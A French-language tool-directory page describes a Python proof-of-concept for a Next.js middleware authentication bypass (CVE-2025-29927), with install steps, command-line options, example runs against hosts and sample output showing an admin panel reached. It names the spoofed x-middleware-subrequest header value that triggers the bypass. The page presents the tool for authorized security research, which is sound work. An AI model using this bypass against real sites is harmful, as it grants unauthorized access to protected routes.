Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
PoC-for-Next.js-Middleware — > 🔓 Preuve de concept pour un contournement fictif du middleware Next.js (CVE-2025-29927) — créez des sous-requêtes pour tester les routes protégées. | Kitploit
Outils/GitHubGitHub/m2hcz/poc-for-next.js-middleware
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et Éducation
GitHubm2hcz/poc-for-next.js-middleware

PoC-for-Next.js-Middleware

> 🔓 Preuve de concept pour un contournement fictif du middleware Next.js (CVE-2025-29927) — créez des sous-requêtes pour tester les routes protégées.

Voir le dépôt
147il y a 1 anPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

PoC pour le contournement du middleware Next.js (CVE-2025-29927)

Python Version Status

Ceci est une preuve de concept pour une vulnérabilité fictive de contournement du middleware Next.js (CVE-2025-29927). À utiliser uniquement à des fins éducatives et de recherche en sécurité autorisée.


🚀 Fonctionnalités

FonctionnalitéDescription
✨ Couleurs et mode verbeuxSortie colorée ; -v pour des journaux de débogage détaillés.
📦 Structure orientée objetConception basée sur les classes pour plus de clarté et de maintenabilité.
🌐 Prise en charge des proxysAchemine le trafic via des proxys HTTP(S) avec --proxy.
🍪 Gestion des sessionsrequests.Session persistante pour les cookies et la réutilisation des connexions.
🚦 Contrôle des redirectionsNe suit pas les redirections par défaut ; détecte clairement la réussite ou l'échec.
🛠 En-têtes personnalisésRemplace User-Agent, x-middleware-subrequest, ou ajoute des en-têtes.

⚡ Installation

root@kitploit:~
# Clone repository
git clone https://github.com/your-username/nextjs-middleware-poc.git
cd nextjs-middleware-poc

# (Optional) Create virtual environment
python3 -m venv .venv
source .venv/bin/activate

# Install dependencies
pip install -r requirements.txt

Nécessite Python 3.7+


🎯 Utilisation

root@kitploit:~
python poc.py [options] <host>[:port]
OptionDescription
-p, --path PATHChemin de la route protégée (défaut : /admin)
-s, --scheme {http,https}Protocole (défaut : http)
--header HEADERValeur de l'en-tête x-middleware-subrequest (défaut : middleware:middleware)
-ua, --user-agent AGENTUser-Agent personnalisé (défaut : Mozilla/5.0)
--proxy PROXYURL du proxy HTTP(S) (ex. : http://127.0.0.1:8080)
-v, --verboseActive la sortie de débogage
-h, --helpAffiche ce message d'aide

🔍 Exemples

1. Test de base

root@kitploit:~
python poc.py localhost:3000

2. HTTPS et chemin personnalisé

root@kitploit:~
python poc.py example.com -s https -p /dashboard

3. Proxy et mode verbeux

root@kitploit:~
python poc.py internal-app:8080 --proxy http://127.0.0.1:8080 -v

✅ Sortie attendue

Succès

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[+] SUCCESS: Middleware bypassed — access granted!
--- Response Snippet ---
<!DOCTYPE html><html>…<title>Admin Panel</title>…

Échec

root@kitploit:~
[*] Target URL: http://localhost:3000/admin
[-] FAIL: Access denied by middleware (302 Redirect)

Télécharger l’outil